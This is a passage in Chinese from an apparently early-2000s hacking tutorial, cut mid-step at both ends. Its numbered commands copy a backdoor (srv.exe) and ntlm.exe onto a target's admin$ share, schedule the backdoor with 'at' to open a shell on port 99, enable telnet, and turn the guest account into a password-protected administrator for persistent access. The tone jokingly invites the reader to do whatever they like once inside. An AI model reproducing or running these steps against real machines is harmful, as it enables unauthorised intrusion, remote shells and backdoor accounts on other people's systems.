administrators

 

，命令即可成功完成。

复制之前务必用 net view \\IP

 

这个命令看一下对方的共享情况

2. C:\>copy srv.exe \\127.0.0.1\admin$ 
先 复 制 srv.exe 上 去 ， 在 流 光 的 Tools 目 录 下 就 有 （ 这 里 的 $ 是 指 admin 用 户 的
c:\winnt\system32\，大家还可以使用 c$、d$，意思是 C 盘与 D 盘，这看你要复制到什么地

 

方去了）。

3. C:\>net time \\127.0.0.1 
查查时间，发现 127.0.0.1 

 

的当前时间是 2002/3/19 

 

上午 11:00

 

，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe 
用 at 命令启动 srv.exe 吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵

 

呵！）

5. C:\>net time \\127.0.0.1 
再查查到时间没有？如果 127.0.0.1 

 

的当前时间是 2002/3/19 

 

上午 11:05，那就准备开始下

 

面的命令。

6. C:\>telnet 127.0.0.1 99 
这里会用到 Telnet 命令吧，注意端口是 99。Telnet 默认的是 23 端口，但是我们使用的是
SRV 在对方计算机中为我们建立一个 99 端口的 Shell

 

。

虽然我们可以 Telnet 上去了，但是 SRV 是一次性的，下次登录还要再激活！所以我们打
算建立一个 Telnet 服务！这就要用到 ntlm

 

了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 
用 Copy 命令把 ntlm.exe 上传到主机上（ntlm.exe 也是在《流光》的 Tools

 

目录中）。

8. C:\WINNT\system32>ntlm 
输入 ntlm 启动（这里的 C:\WINNT\system32>指的是对方计算机，运行 ntlm 其实是让这个
程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net 
start telnet"来开启 Telnet

 

服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在 DOS 上操作一样
简单！(然后你想做什么?想做什么就做什么吧,哈哈) 

为了以防万一,我们再把 guest

 

激活加到管理组

10. C:\>net user guest /active:yes 
将对方的 Guest

 

用户激活

11. C:\>net user guest 1234 
将 Guest 的密码改为 1234,

 

或者你要设定的密码

12. C:\>net localgroup administrators guest /add 
将 Guest 变为 Administrator^_^(如果管理员密码更改，guest 帐号没改变的话，下次我们可